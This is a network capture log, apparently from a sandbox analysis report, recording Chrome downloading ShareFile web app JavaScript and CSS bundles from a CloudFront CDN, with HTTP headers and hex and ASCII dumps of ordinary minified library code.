                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC14808INData Raw: 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 72 65 74 75 72 6e 7b 6d 6f 6e 74 68 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3f 74 2e 66 6f 72 6d 61 74 28 22 4d 4d 4d 4d 22 29 3a 69 28 65 2c 22 6d 6f 6e 74 68 73 22 29 7d 2c 6d 6f 6e 74 68 73 53 68 6f 72 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3f 74 2e 66 6f 72 6d 61 74 28 22 4d 4d 4d 22 29 3a 69 28 65 2c 22 6d 6f 6e 74 68 73 53 68 6f 72 74 22 2c 22 6d 6f 6e 74 68 73 22 2c 33 29 7d 2c 66 69 72 73 74 44 61 79 4f 66 57 65 65 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 24 6c 6f 63 61 6c 65 28 29 2e 77 65 65 6b 53 74 61 72 74 7c 7c 30 7d 2c 77 65 65 6b 64 61 79 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3f
                                                                                                                                                                                                                      Data Ascii: ction(){var e=this;return{months:function(t){return t?t.format("MMMM"):i(e,"months")},monthsShort:function(t){return t?t.format("MMM"):i(e,"monthsShort","months",3)},firstDayOfWeek:function(){return e.$locale().weekStart||0},weekdays:function(t){return t?
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC1576INData Raw: 6e 61 6d 65 29 29 7d 2c 6e 2e 6d 61 72 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 53 29 3a 28 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 53 2c 66 28 65 2c 64 2c 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 29 29 2c 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 41 29 2c 65 7d 2c 6e 2e 61 77 72 61 70 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 5f 5f 61 77 61 69 74 3a 65 7d 7d 2c 44 28 4f 2e 70 72 6f 74 6f 74 79 70 65 29 2c 66 28 4f 2e 70 72 6f 74 6f 74 79 70 65 2c 75 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 29 29 2c
                                                                                                                                                                                                                      Data Ascii: name))},n.mark=function(e){return Object.setPrototypeOf?Object.setPrototypeOf(e,S):(e.__proto__=S,f(e,d,"GeneratorFunction")),e.prototype=Object.create(A),e},n.awrap=function(e){return{__await:e}},D(O.prototype),f(O.prototype,u,(function(){return this})),


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      59192.168.2.174977913.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC576OUTGET /sharefile-web/sharefiledev-templates-pilet/0.110.3/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 09:05:57 GMT
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 02:50:55 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 23776effa8a63b2e2dccd702e73b0c86.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: s726nHa5XAVJfIqGWS3f54AQCKzy4ueJBoTntXvuiUUIuElPn_PYbA==
                                                                                                                                                                                                                      Age: 37815
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      60192.168.2.174978013.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC422OUTGET /sharefile-web/sharefiledev-templates-pilet/0.110.3/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 694747
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 02:50:55 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:11 GMT
                                                                                                                                                                                                                      ETag: "30f6ff4cc9b4cb4a5fc2ba1c682cce69"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 3bf3e75bcb9a86b3eb343a1d4392a6de.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: zC-EgRzMlGQ8jVLoWrqzQfmmQcL3skRg42dqRi3J1TLtgBLIwAM9Lg==
                                                                                                                                                                                                                      Age: 1
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 65 6d 70 6c 61 74 65 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 61 3d 7b 7d 2c 69 3d 7b 7d 2c 73 3d 7b 7d 2c 6f 3d 7b 7d 2c 6c 3d 7b 7d 2c 75 3d 7b 7d 3b 72 65 74 75
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevtemplatespilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},a={},i={},s={},o={},l={},u={};retu
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 7c 65 2e 73 70 65 65 64 79 2c 74 68 69 73 2e 74 61 67 73 3d 5b 5d 2c 74 68 69 73 2e 63 74 72 3d 30 2c 74 68 69 73 2e 6e 6f 6e 63 65 3d 65 2e 6e 6f 6e 63 65 2c 74 68 69 73 2e 6b 65 79 3d 65 2e 6b 65 79 2c 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 3d 65 2e 63 6f 6e 74 61 69 6e 65 72 2c 74 68 69 73 2e 70 72 65 70 65 6e 64 3d 65 2e 70 72 65 70 65 6e 64 2c 74 68 69 73 2e 69 6e 73 65 72 74 69 6f 6e 50 6f 69 6e 74 3d 65 2e 69 6e 73 65 72 74 69 6f 6e 50 6f 69 6e 74 2c 74 68 69 73 2e 62 65 66 6f 72 65 3d 6e 75 6c 6c 7d 76 61 72 20 74 3d 65 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 68 79 64 72 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 66 6f 72 45 61 63 68 28 74 68 69 73 2e 5f 69 6e 73 65 72 74 54 61 67 29 7d 2c 74 2e 69 6e 73 65 72 74
                                                                                                                                                                                                                      Data Ascii: |e.speedy,this.tags=[],this.ctr=0,this.nonce=e.nonce,this.key=e.key,this.container=e.container,this.prepend=e.prepend,this.insertionPoint=e.insertionPoint,this.before=null}var t=e.prototype;return t.hydrate=function(e){e.forEach(this._insertTag)},t.insert
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC5608INData Raw: 6e 74 7c 66 6f 6e 74 57 65 69 67 68 74 7c 66 6f 72 6d 61 74 7c 66 72 6f 6d 7c 66 72 7c 66 78 7c 66 79 7c 67 31 7c 67 32 7c 67 6c 79 70 68 4e 61 6d 65 7c 67 6c 79 70 68 4f 72 69 65 6e 74 61 74 69 6f 6e 48 6f 72 69 7a 6f 6e 74 61 6c 7c 67 6c 79 70 68 4f 72 69 65 6e 74 61 74 69 6f 6e 56 65 72 74 69 63 61 6c 7c 67 6c 79 70 68 52 65 66 7c 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 7c 67 72 61 64 69 65 6e 74 55 6e 69 74 73 7c 68 61 6e 67 69 6e 67 7c 68 6f 72 69 7a 41 64 76 58 7c 68 6f 72 69 7a 4f 72 69 67 69 6e 58 7c 69 64 65 6f 67 72 61 70 68 69 63 7c 69 6d 61 67 65 52 65 6e 64 65 72 69 6e 67 7c 69 6e 7c 69 6e 32 7c 69 6e 74 65 72 63 65 70 74 7c 6b 7c 6b 31 7c 6b 32 7c 6b 33 7c 6b 34 7c 6b 65 72 6e 65 6c 4d 61 74 72 69 78 7c 6b 65 72 6e 65 6c 55 6e 69
                                                                                                                                                                                                                      Data Ascii: nt|fontWeight|format|from|fr|fx|fy|g1|g2|glyphName|glyphOrientationHorizontal|glyphOrientationVertical|glyphRef|gradientTransform|gradientUnits|hanging|horizAdvX|horizOriginX|ideographic|imageRendering|in|in2|intercept|k|k1|k2|k3|k4|kernelMatrix|kernelUni
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 74 46 6f 72 6d 61 74 3d 76 6f 69 64 20 30 3b 63 6f 6e 73 74 20 72 3d 6e 28 36 36 33 38 29 2c 61 3d 6e 28 31 32 36 30 29 3b 74 2e 61 73 73 65 72 74 46 6f 72 6d 61 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 72 79 7b 63 6f 6e 73 74 20 6e 3d 28 30 2c 61 2e 70 61 72 73 65 52 49 44 29 28 65 29 3b 69 66 28 6e 2e 73 79 73 74 65 6d 21 3d 3d 74 2e 73 79 73 74 65 6d 29 74 68 72 6f 77 20 6e 65 77 20 72 2e 46 6f 72 6d 61 74 41 73 73 65 72 74 69 6f 6e 45 72 72 6f 72 28 7b 6d 65 73 73 61 67 65 3a 22 54 68 65 20 70 72 6f 76 69 64 65 64 20 52 49 44 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 61 20 6d 61 74 63 68 69 6e 67 20 60 73 79 73 74 65 6d 60 20 70 61 72 74 2e 22 7d 29 3b 69 66 28 6e 2e 73 65 67 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 74 2e 73 65 67 6d 65 6e
                                                                                                                                                                                                                      Data Ascii: tFormat=void 0;const r=n(6638),a=n(1260);t.assertFormat=function(e,t){try{const n=(0,a.parseRID)(e);if(n.system!==t.system)throw new r.FormatAssertionError({message:"The provided RID does not have a matching `system` part."});if(n.segments.length<t.segmen
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC9644INData Raw: 32 39 34 39 36 37 32 39 35 3b 66 6f 72 28 76 61 72 20 5f 3d 30 3b 5f 3c 6c 3b 2b 2b 5f 29 7b 66 6f 72 28 76 61 72 20 68 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 38 30 29 2c 66 3d 30 3b 66 3c 31 36 3b 2b 2b 66 29 68 5b 66 5d 3d 75 5b 5f 5d 5b 66 5d 3b 66 6f 72 28 76 61 72 20 70 3d 31 36 3b 70 3c 38 30 3b 2b 2b 70 29 68 5b 70 5d 3d 72 28 68 5b 70 2d 33 5d 5e 68 5b 70 2d 38 5d 5e 68 5b 70 2d 31 34 5d 5e 68 5b 70 2d 31 36 5d 2c 31 29 3b 66 6f 72 28 76 61 72 20 79 3d 61 5b 30 5d 2c 67 3d 61 5b 31 5d 2c 76 3d 61 5b 32 5d 2c 4d 3d 61 5b 33 5d 2c 62 3d 61 5b 34 5d 2c 4c 3d 30 3b 4c 3c 38 30 3b 2b 2b 4c 29 7b 76 61 72 20 77 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 4c 2f 32 30 29 2c 6b 3d 72 28 79 2c 35 29 2b 6e 28 77 2c 67 2c 76 2c 4d 29 2b 62 2b 74 5b 77 5d
                                                                                                                                                                                                                      Data Ascii: 294967295;for(var _=0;_<l;++_){for(var h=new Uint32Array(80),f=0;f<16;++f)h[f]=u[_][f];for(var p=16;p<80;++p)h[p]=r(h[p-3]^h[p-8]^h[p-14]^h[p-16],1);for(var y=a[0],g=a[1],v=a[2],M=a[3],b=a[4],L=0;L<80;++L){var w=Math.floor(L/20),k=r(y,5)+n(w,g,v,M)+b+t[w]
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 73 2c 74 2e 6f 70 74 69 6f 6e 73 29 29 72 65 74 75 72 6e 21 31 7d 65 6c 73 65 20 69 66 28 21 76 28 74 2e 71 75 65 72 79 4b 65 79 2c 73 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 22 61 6c 6c 22 21 3d 3d 6e 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 69 73 41 63 74 69 76 65 28 29 3b 69 66 28 22 61 63 74 69 76 65 22 3d 3d 3d 6e 26 26 21 65 29 72 65 74 75 72 6e 21 31 3b 69 66 28 22 69 6e 61 63 74 69 76 65 22 3d 3d 3d 6e 26 26 65 29 72 65 74 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 6f 26 26 74 2e 69 73 53 74 61 6c 65 28 29 21 3d 3d 6f 7c 7c 76 6f 69 64 20 30 21 3d 3d 61 26 26 61 21 3d 3d 74 2e 73 74 61 74 65 2e 66 65 74 63 68 53 74 61 74 75 73 7c 7c 69 26 26 21 69 28 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65
                                                                                                                                                                                                                      Data Ascii: s,t.options))return!1}else if(!v(t.queryKey,s))return!1;if("all"!==n){const e=t.isActive();if("active"===n&&!e)return!1;if("inactive"===n&&e)return!1}return!("boolean"==typeof o&&t.isStale()!==o||void 0!==a&&a!==t.state.fetchStatus||i&&!i(t))}function p(e
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 29 7d 29 29 7d 67 65 74 41 6c 6c 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 7d 66 69 6e 64 28 65 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 65 2e 65 78 61 63 74 26 26 28 65 2e 65 78 61 63 74 3d 21 30 29 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 2e 66 69 6e 64 28 28 74 3d 3e 70 28 65 2c 74 29 29 29 7d 66 69 6e 64 41 6c 6c 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 2e 66 69 6c 74 65 72 28 28 74 3d 3e 70 28 65 2c 74 29 29 29 7d 6e 6f 74 69 66 79 28 65 29 7b 46 2e 62 61 74 63 68 28 28 28 29 3d 3e 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 74 28 65 29 7d 29 29 7d 29 29 7d 72 65 73 75 6d 65 50 61 75 73 65 64 4d 75 74 61 74 69 6f 6e 73 28 29 7b
                                                                                                                                                                                                                      Data Ascii: )}))}getAll(){return this.mutations}find(e){return void 0===e.exact&&(e.exact=!0),this.mutations.find((t=>p(e,t)))}findAll(e){return this.mutations.filter((t=>p(e,t)))}notify(e){F.batch((()=>{this.listeners.forEach((t=>{t(e)}))}))}resumePausedMutations(){
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 75 73 65 20 51 75 65 72 79 43 6c 69 65 6e 74 50 72 6f 76 69 64 65 72 20 74 6f 20 73 65 74 20 6f 6e 65 22 29 3b 72 65 74 75 72 6e 20 74 7d 2c 63 65 3d 61 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 21 31 29 2c 6d 65 3d 28 29 3d 3e 61 2e 75 73 65 43 6f 6e 74 65 78 74 28 63 65 29 2c 5f 65 3d 63 65 2e 50 72 6f 76 69 64 65 72 3b 66 75 6e 63 74 69 6f 6e 20 68 65 28 29 7b 6c 65 74 20 65 3d 21 31 3b 72 65 74 75 72 6e 7b 63 6c 65 61 72 52 65 73 65 74 3a 28 29 3d 3e 7b 65 3d 21 31 7d 2c 72 65 73 65 74 3a 28 29 3d 3e 7b 65 3d 21 30 7d 2c 69 73 52 65 73 65 74 3a 28 29 3d 3e 65 7d 7d 63 6f 6e 73 74 20 66 65 3d 61 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 68 65 28 29 29 2c 70 65 3d 28 29 3d 3e 61 2e 75 73 65 43 6f 6e 74 65 78 74 28 66 65 29 3b 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                      Data Ascii: use QueryClientProvider to set one");return t},ce=a.createContext(!1),me=()=>a.useContext(ce),_e=ce.Provider;function he(){let e=!1;return{clearReset:()=>{e=!1},reset:()=>{e=!0},isReset:()=>e}}const fe=a.createContext(he()),pe=()=>a.useContext(fe);functio
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC14808INData Raw: 72 2e 66 6f 72 45 61 63 68 28 74 68 69 73 2e 68 61 6e 64 6c 65 72 73 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 75 6c 6c 21 3d 3d 74 26 26 65 28 74 29 7d 29 29 7d 2c 65 2e 65 78 70 6f 72 74 73 3d 61 7d 2c 34 30 39 37 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 31 37 39 33 29 2c 61 3d 6e 28 37 33 30 33 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 26 26 21 72 28 74 29 3f 61 28 65 2c 74 29 3a 74 7d 7d 2c 33 35 37 32 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 34 38 36 37 29 2c 61 3d 6e 28 38 35 32 37 29 2c 69 3d 6e 28 36 35 30 32 29 2c 73 3d 6e 28 35 35 34 36 29 2c 6f 3d 6e 28 36 34 34 29 3b 66 75
                                                                                                                                                                                                                      Data Ascii: r.forEach(this.handlers,(function(t){null!==t&&e(t)}))},e.exports=a},4097:(e,t,n)=>{"use strict";var r=n(1793),a=n(7303);e.exports=function(e,t){return e&&!r(t)?a(e,t):t}},3572:(e,t,n)=>{"use strict";var r=n(4867),a=n(8527),i=n(6502),s=n(5546),o=n(644);fu
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC1576INData Raw: 22 2c 7b 78 3a 22 34 36 22 2c 79 3a 22 32 31 2e 30 33 37 31 22 2c 77 69 64 74 68 3a 22 31 31 22 2c 68 65 69 67 68 74 3a 22 33 22 2c 66 69 6c 6c 3a 22 23 30 43 30 44 30 44 22 7d 2c 76 6f 69 64 20 30 29 2c 28 30 2c 72 2e 74 5a 29 28 22 72 65 63 74 22 2c 7b 78 3a 22 36 33 22 2c 79 3a 22 32 31 2e 30 33 37 31 22 2c 77 69 64 74 68 3a 22 31 30 22 2c 68 65 69 67 68 74 3a 22 33 22 2c 66 69 6c 6c 3a 22 23 30 43 30 44 30 44 22 7d 2c 76 6f 69 64 20 30 29 2c 28 30 2c 72 2e 74 5a 29 28 22 72 65 63 74 22 2c 7b 78 3a 22 37 39 22 2c 79 3a 22 32 31 2e 30 33 37 31 22 2c 77 69 64 74 68 3a 22 31 31 22 2c 68 65 69 67 68 74 3a 22 33 22 2c 66 69 6c 6c 3a 22 23 30 43 30 44 30 44 22 7d 2c 76 6f 69 64 20 30 29 2c 28 30 2c 72 2e 74 5a 29 28 22 63 69 72 63 6c 65 22 2c 7b 63 78 3a 22
                                                                                                                                                                                                                      Data Ascii: ",{x:"46",y:"21.0371",width:"11",height:"3",fill:"#0C0D0D"},void 0),(0,r.tZ)("rect",{x:"63",y:"21.0371",width:"10",height:"3",fill:"#0C0D0D"},void 0),(0,r.tZ)("rect",{x:"79",y:"21.0371",width:"11",height:"3",fill:"#0C0D0D"},void 0),(0,r.tZ)("circle",{cx:"


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      61192.168.2.174978113.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC427OUTGET /sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 904512
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Mar 2024 06:32:15 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:12 GMT
                                                                                                                                                                                                                      ETag: "4bca71b5e96ba1017d2f126850c99835"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 69f13f852a135432abb1b7bfc5a8b420.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: X9YEofl-O2sS0UgLFwmp6a3VOm9KlW8P4gMeCZ0O386uFpkeiytuqA==
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 68 72 65 61 74 61 6c 65 72 74 6d 67 74 70 69 6c 65 74 2c 7b 22 40 63 69 74 72 69 74 65 2f 63 69 74 72 69 78 2d 75 69 40 32 35 2e 34 36 2e 30 22 3a 22 63 69 74 72 69 74 65 2d 63 69 74 72 69 78 2d 75 69 2e 6a 73 22 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 72 65 61 63 74 22 2c 22 40 63 69 74 72 69 74 65 2f 63 69 74 72 69 78 2d 75 69 40 32 35 2e 34 36 2e 30 22 2c 22 74 73 6c 69 62 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevthreatalertmgtpilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"})System.register(["react","@citrite/citrix-ui@25.46.0","tslib","react-dom"],(function(e,t){var n={},r={},o={},i={};return Object.defineProper
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 61 78 2d 66 6f 72 77 61 72 64 73 22 2c 22 70 72 6f 78 79 2d 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 22 2c 22 72 65 66 65 72 65 72 22 2c 22 72 65 74 72 79 2d 61 66 74 65 72 22 2c 22 75 73 65 72 2d 61 67 65 6e 74 22 5d 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 2c 69 2c 61 3d 7b 7d 3b 72 65 74 75 72 6e 20 65 3f 28 72 2e 66 6f 72 45 61 63 68 28 65 2e 73 70 6c 69 74 28 22 5c 6e 22 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 69 3d 65 2e 69 6e 64 65 78 4f 66 28 22 3a 22 29 2c 74 3d 72 2e 74 72 69 6d 28 65 2e 73 75 62 73 74 72 28 30 2c 69 29 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 72 2e 74 72 69 6d 28 65 2e 73 75 62 73 74 72 28 69 2b 31 29 29 2c 74 29 7b 69 66 28 61 5b 74 5d 26 26 6f 2e 69 6e
                                                                                                                                                                                                                      Data Ascii: ax-forwards","proxy-authorization","referer","retry-after","user-agent"];e.exports=function(e){var t,n,i,a={};return e?(r.forEach(e.split("\n"),(function(e){if(i=e.indexOf(":"),t=r.trim(e.substr(0,i)).toLowerCase(),n=r.trim(e.substr(i+1)),t){if(a[t]&&o.in
